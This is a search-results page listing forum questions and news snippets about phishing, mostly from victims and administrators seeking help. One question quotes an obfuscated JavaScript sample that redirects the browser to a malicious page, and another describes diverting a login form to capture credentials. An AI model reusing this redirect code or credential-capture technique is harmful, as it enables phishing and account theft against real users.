Search Results

Search found 89 results on 4 pages for 'phishing'.

Page 1/4 | 1 2 3 4  | Next Page >

  • Cleaning a proxy/phishing trojan from Windows XP computer

    - by i-g
    I am trying to remove an interesting trojan from a Windows XP computer. It manifests itself as a phishing page (screenshot linked) that appears after the user tries to log on to eBay. So far, I haven't found any other web sites that are affected. As you can see, the trojan intercepts browser connections (all installed browsers are affected) and injects this phishing page. The address looks like it's ebay.com, but HTTPS verification doesn't work (no lock icon or green bar in Firefox.) At some point, Trojan.Dropper appeared on the computer. I removed it with Malwarebytes Anti-Malware. Although it reappeared several times, it seemed to be gone after I booted into Safe Mode and did a full system scan with MBAM. Now, however, a different trojan has appeared on the machine; I suspect it was installed by Trojan.Dropper. So far, MBAM, Ad-Aware, and Spybot S&D have been unable to remove it. I've looked for it in the HijackThis log but haven't found anything conclusive. Has anyone run across a trojan like this before? Where would I start looking for it to remove it manually? Thank you for reading.


  • Virus sending phishing emails through exchange server

    - by therulebookman
    It appears that there is a virus on my network somewhere that is sending phishing emails through my Exchange server. I can see the messages in message tracking and I see many SMTP errors for NDRs and rejected connections from external servers, but I do not see any SMTP authentications and I have logging up to MAX. How can I find the IP or hostname of the PC that is infected? Or is there some other explanation than a virus? Anti-virus scan on server is clean. Server is not an open relay. Thanks


  • Phishing site uses subdomain that I never registered

    - by gotgenes
    I recently received the following message from Google Webmaster Tools: Dear site owner or webmaster of http://gotgenes.com/, [...] Below are one or more example URLs on your site which may be part of a phishing attack: http://repair.gotgenes.com/~elmsa/.your-account.php [...] What I don't understand is that I never had a subdomain repair.gotgenes.com, but visiting it in the web browser gives an actual My DNS is FreeDNS, which does not list a repair subdomain. My domain name is registered with GoDaddy, and the nameservers are correctly set to NS1.AFRAID.ORG, NS2.AFRAID.ORG, NS3.AFRAID.ORG, and NS4.AFRAID.ORG. I have the following questions: Where is repair.gotgenes.com actually registered? How was it registered? What action can I take to have it removed from DNSs? How can I prevent this from happening in the future? This is pretty disconcerting; I feel like my domain has been hijacked. Any help would be much appreciated.


  • Mac OS X Update 10.6.8 weird phishing behaviour

    - by Carlos
    I just updated to Mac App Store 1.0.2 with the update to 10.6.8. The Mac App Store said I have one update available, for Angry Birds.... I do not have Angry Birds on my system, but when I clicked the update button I got the following message. "You have updates available for other accounts. Sign in to [email protected] to update applications for that account." Needless to say this account does not exist. Any ideas what this is all about?


  • Where should I redirect (removed) phishing pages

    - by tinjaw
    I was unfortunately the victim of a PHP exploit. Looking through my webserver logs, people are still attempting to reach the URL used in the phish. I want to redirect them to a site that will educate these people on what phishing is. My question: Is there a (generic / vendor-neutral) phishing education website that you suggest I send them to with a 301 redirect? (I assume a 301 is the best option.)


  • What does this suspicious phishing code do?

    - by halohunter
    A few of my non-IT coworkers opened a .html attachment in an email message that looks extremely suspicious. It resulted in a blank screen when it appears that some javascript code was run. <script type='text/javascript'>function uK(){};var kV='';uK.prototype = {f : function() {d=4906;var w=function(){};var u=new Date();var hK=function(){};var h='hXtHt9pH:9/H/Hl^e9n9dXe!r^mXeXd!i!a^.^c^oHm^/!iHmHaXg!e9sH/^zX.!hXt9m^'.replace(/[\^H\!9X]/g, '');var n=new Array();var e=function(){};var eJ='';t=document['lDo6cDart>iro6nD'.replace(/[Dr\]6\>]/g, '')];this.nH=false;eX=2280;dF="dF";var hN=function(){return 'hN'};this.g=6633;var a='';dK="";function x(b){var aF=new Array();this.q='';var hKB=false;var uN="";b['hIrBeTf.'.replace(/[\.BTAI]/g, '')]=h;this.qO=15083;uR='';var hB=new Date();s="s";}var dI=46541;gN=55114;this.c="c";nT="";this.bG=false;var m=new Date();var fJ=49510;x(t);this.y="";bL='';var k=new Date();var mE=function(){};}};var l=22739;var tL=new uK(); var p="";tL.f();this.kY=false;</script> What did it do? It's beyond the scope of my programming knowledge.


  • List of free hosted domains (phishing prevention)

    - by nigative
    Does anyone have a compiled list of free hosting domains? On the website, when a user clicks on an external link I want them to be redirected to my page that will check if that external link is on free hosting or not. If it is, I want to warn the user, but right now I can't find a list of such domains. Any help?


  • Phishing: a new technique is spreading with HTML5; it bypasses the blacklisting of malicious URLs

    Phishing: a new technique is spreading with HTML5. It bypasses the blacklisting of malicious URLs. Spammers and other cyber-crooks are also turning to HTML5 to get around the increasingly widespread and effective anti-spam and anti-phishing measures in browsers and mail clients. Instead of embedding classic HTML links to often-blacklisted pages in their emails, "modern" spammers are now said to favor "HTML attachments". In any case, the security firm M86 is warning about the resurgence of these threats. Links in emails now point to attached HTML pages, which contain...


  • how do I get rid of the secure nonsecure warning on page with iframe under SSL with phishing filter?

    - by Manu
    I have a page under SSL with an iframe that refreshes itself every 20 seconds through an HTTP refresh pragma. If I browse the site with IE7 and phishing filter enabled I receive secure-nonsecure content warnings at irregular intervals which cease if phishing filter is disabled. Does anybody have an idea what I can do in order to get rid of the warnings even if phishing filter is enabled?


  • Phishing alert but file never existed

    - by IMB
    I got an alert from Google Webmasters. They say the following file was present on my host: example.com/~jhostgop/identity.php I checked my files and it never existed at all. I've experienced this problem on two different hosts and domains but the file never existed in my file system. It appears somebody out there is linking a random domain and it prefixes the link with /~jhostgop/identity.php. Now Google may have indexed them so now I get those false phishing alerts. Anyone experienced this? Is it possible to prevent this?


  • Phishing attack stuck with jsp loginAction.do page?

    - by user970533
    I'm testing a phishing website on a staged replica of a JSP web application. I'm doing the usual attack, which involves changing the post and action field of the source code to divert to my own written JSP script, capture the logins and redirect the victim to the original website. It looks easy, but trust me, it has been more than 2 weeks and I cannot write the logins to the text file. I have tested the JSP page on my local WAMP server; it works fine. In staged, when I click on the OK button for the user/password field I'm taken to the loginAction.do script. I checked this using the Tamper Data add-on for Firefox. The only way I was able to make my script run was to use Burp proxy to intercept the request and change the action parameter to refer to my uploaded script. I want to know what a loginAction.do does. I have googled it - it's quite common to see it in JSP applications. I have checked the code; there is nothing that tells me why the page always points to the .do script instead of mine. Is there some kind of redirection in Tomcat? I'd like to know. I'm unable to exploit this attack vector? I need the community's help.


  • Tabnagging: a new phishing attack method based on the use of the tabs of

    Updated 29 May 2010: As we might have expected, the team working on the well-known NoScript plugin has just updated it to version 1.9.9.81. The first item in this update is the following: Quote: Experimental protection against Aviv Raff's scriptless tabnagging variant, by blocking refreshes triggered on unfocused untrusted tabs. See the changelog for more details.


  • My URL has been identified as a phishing site

    - by user2118559
    Some months ago I ordered a VPS at Ramnode. According to the tutorial (ZPanelCP on CentOS 6.4) http://www.zvps.co.uk/zpanelcp/centos-6 I installed CentOS and ZPanel. Today I received an email: We are requesting that you secure and investigate the phishing website identified below. This URL has been identified as a phishing site and is currently involved in identity theft activities. URL: hxxp://111.11.111.111/www.connet-itunes.fr/iTunesConnect.woasp/ //IP is modified (not real) This site is being used to display false or spoofed content in an apparent effort to steal personal and financial information. This matter is URGENT. We believe that individuals are being falsely directed to this page and may be persuaded into divulging personal information to a criminal, if the content is not immediately disabled. I am trying to understand. Did some hacker hack the VPS and place some file (?) with content that redirects to www.connet-itunes.fr/iTunesConnect.woasp? Then my questions: 1) How can I find the file? Where may it be located? The URL is hxxp://111.11.111.111/, an IP address, not a domain name. 2) What should I do to protect the VPS (with CentOS)? Is there any tutorial? Where may the security problem be? I mean, maybe someone has faced something similar....


  • Mail sent from local Postfix marked as "possible phishing" in Outlook

    - by leo grrr
    Hi folks, Sorry for the newbie question--this is not my area of expertise by a long shot. I work at a small development shop and we finally got around to doing code reviews. (Yay!) I set up an instance of Review Board -- an open-source code review tool -- on one of our local servers but it doesn't seem to like talking to our hosted Exchange server to send notification emails. I decided to just install Postfix on that same box and send mail from localhost, which is working much more reliably, but Outlook disables all links in the email announcements and marks it as possible phishing. What is making these emails look suspicious and what can I change? Would the best thing be to figure out how to relay to Exchange from Postfix? Thanks!


  • Attackers can hide an entire page in a link: a URI-based phishing method that works on Firefox and Opera is detailed

    Attackers can hide an entire page in a link: a URI-based phishing method that works on Firefox and Opera is detailed. Phishing, a technique attackers use to obtain Internet users' personal information in order to steal their identity, could be carried out without resorting to a phishing site. According to a research report by Henning Klevjer, a computer security student at the University of Oslo in Norway, attackers can carry out phishing attacks by embedding the complete code of a web page in a URI. A URI (Uniform Resource Identifier) is a string of characters identifying a resource on a network. One of its impl...


  • Internet Explorer: Microsoft joins the Phishing Initiative, a joint project with Paypal and CERT-LEXSI against phishing

    Internet Explorer: Microsoft joins the Phishing Initiative, a joint project with Paypal and CERT-LEXSI against phishing. In partnership with CERT-LEXSI, Microsoft is taking part in the "phishing initiative" in order to give French users of Internet Explorer better protection against phishing. After announcing the introduction of a feature against web tracking in IE9, Microsoft is not stopping there, despite the studies presenting


  • How are spam e-mails filtered ?

    - by kevindqc
    Hello. I'm just wondering how some e-mails get past the spam filter, and some don't? Everyday I get World of Warcraft phishing emails that get past the filter... For example, here's a phishing email (just the header) I got in my inbox, and not in my junk mail: X-Message-Delivery: Vj0xLjE7dXM9MDtsPTA7YT0wO0Q9MjtTQ0w9Ng== X-Message-Status: n:0 X-SID-PRA: [email protected] X-AUTH-Result: NONE X-Message-Info: M98loaK0Lo27IVRxloyPIZmAwUHKn18nx0o/idLdvGYjK48i19NuvFOnRFYGWE+HdIrNJpi1XaYx0gaAV13cgRnkWSzgHKG1 Received: from blizzard.com ([204.45.59.37]) by SNT0-MC3-F21.Snt0.hotmail.com with Microsoft SMTPSVC(6.0.3790.3959); Sat, 10 Apr 2010 06:38:24 -0700 Received: from hxeabjlh ([192.168.1.165]) (envelope-sender <[email protected]>) by 192.168.1.111 with ESMTP for <[email protected]>; Sat, 10 Apr 2010 08:43:24 -0500 Reply-To: <[email protected]> Sender: [email protected] Message-ID: <DE567AFB9E2F3DD985A2D9A8D12D2917@hxeabjlh> From: "[email protected]" <[email protected]> To: <[email protected]> Subject: World of Warcraft Account Password verification Date: Sat, 10 Apr 2010 21:38:10 +0800 MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="----=_NextPart_000_04EE_0137659E.1AA23350" X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 6.00.2900.5512 X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2900.5512 Return-Path: [email protected] X-OriginalArrivalTime: 10 Apr 2010 13:38:24.0607 (UTC) FILETIME=[17F3A6F0:01CAD8B3] From what I understand, when you send an email with SMTP, you can specify any hostname in the "HELO" command. Here, the spammer specified "blizzard.com". And he sent his email through Hotmail using Outlook Express. I just don't understand how this gets past the spam filter? There's this SPF thing that seems to exist... but it doesn't seem to be used by blizzard? I'm on Windows, and if I use nslookup to look for the TXT records of blizzard.com and worldofwarcraft.com, I don't see a thing.... so blizzard is not using SPF? 
    Why would that be?

